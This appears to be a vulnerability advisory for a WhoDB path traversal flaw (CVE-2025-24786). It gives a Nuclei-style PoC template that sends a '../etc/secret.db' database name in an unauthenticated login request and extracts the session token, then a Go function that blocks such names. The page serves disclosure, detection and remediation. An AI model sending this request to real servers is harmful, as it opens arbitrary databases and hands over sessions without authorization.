CVE-2025-24786: WhoDB < 0.45.0 - Path Traversal

Date: 2026-02-03 | Affected software: Unknown | PoC: Published

Vulnerability description

WhoDB contains a path traversal vulnerability caused by a lack of validation when opening database files. An unauthenticated attacker who controls the database filename input can make the server open arbitrary SQLite3 database files on the host system.

PoC code [published]

id: CVE-2025-24786

info:
  name: WhoDB < 0.45.0 - Path Traversal
  author: basicbeny
  severity: high
  description: |
    WhoDB contains a path traversal caused by lack of validation when opening database files, letting unauthenticated attackers access arbitrary Sqlite3 databases on the host system, exploit requires attacker to manipulate database filename input.
  impact: |
    Attackers can access any Sqlite3 database on the system, potentially exposing sensitive data.
  remediation: |
    Upgrade to version 0.45.0 or later.
  reference:
    - https://github.com/clidey/whodb
    - https://github.com/clidey/whodb/security/advisories/GHSA-9r4c-jwx3-3j76
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24786
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-24786
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    vendor: clidey
    product: whodb
    fofa-query: body="whodb"
  tags: cve,cve2025,whodb,lfi,pathtraversal,unauth

http:
  - raw:
      - |
        POST /api/query HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"operationName":"Login","variables":{"credentials":{"Type":"Sqlite3","Hostname":"","Database":"../etc/secret.db","Username":"","Password":"","Advanced":[]}},"query":"mutation Login($credentials: LoginCredentials!) {\n  Login(credentials: $credentials) {\n    Status\n    __typename\n  }\n}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Status":true'
          - '"StatusResponse"'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: header
        name: token
        group: 1
        regex:
          - 'Token=([^;]+)'
# digest: 4a0a00473045022100c3d7c5b1760b0c65b8db96230045cc9a0e7e6c8b31ab770665f1156f7fff6746022071541284a708954c3783a76af45977fdef80c3069e5a570bff55db0412ba5a99:922c64590222798bb761d5b6d8e72950
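The defect described above is a missing containment check on the Database value sent in the Sqlite3 login credentials. The following Go function is an added example of such a check, written for this page and not taken from the WhoDB code base; the base directory, function name and error value are assumptions. It resolves the user-supplied name under an operator-chosen directory and refuses any name that would escape it, including the "../etc/secret.db" pattern used by the PoC.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideBase is returned when a requested database name would resolve
// to a file outside the permitted SQLite directory. (Hypothetical name.)
var ErrOutsideBase = errors.New("database name escapes the allowed directory")

// ResolveSQLiteDatabase maps a user-supplied Database value onto a path under
// baseDir and rejects anything that would leave baseDir. The check is purely
// lexical (Clean + Rel), so the operator must also make sure baseDir itself
// contains no symlinks that point elsewhere. Hypothetical helper, not WhoDB's.
func ResolveSQLiteDatabase(baseDir, name string) (string, error) {
	if name == "" {
		return "", errors.New("empty database name")
	}
	// An absolute or rooted name must never be accepted as a relative one.
	if filepath.IsAbs(name) || strings.HasPrefix(name, "/") || strings.HasPrefix(name, "\\") {
		return "", ErrOutsideBase
	}
	base := filepath.Clean(baseDir)
	// Join cleans the result, so "../etc/secret.db" collapses to
	// "<parent of base>/etc/secret.db" and "sub/../app.db" to "<base>/app.db".
	candidate := filepath.Join(base, name)
	// Rel describes how to reach candidate from base; a leading ".." segment
	// means the candidate lies outside base.
	rel, err := filepath.Rel(base, candidate)
	if err != nil {
		return "", err
	}
	if rel == "." {
		return "", errors.New("database name resolves to the directory itself")
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideBase
	}
	return candidate, nil
}

func main() {
	// Constructed sample inputs, including the PoC's traversal value.
	for _, n := range []string{"app.db", "sub/../app.db", "../etc/secret.db", "/etc/passwd"} {
		p, err := ResolveSQLiteDatabase("/var/lib/whodb/sqlite", n)
		fmt.Printf("%-20q -> %q err=%v\n", n, p, err)
	}
}
```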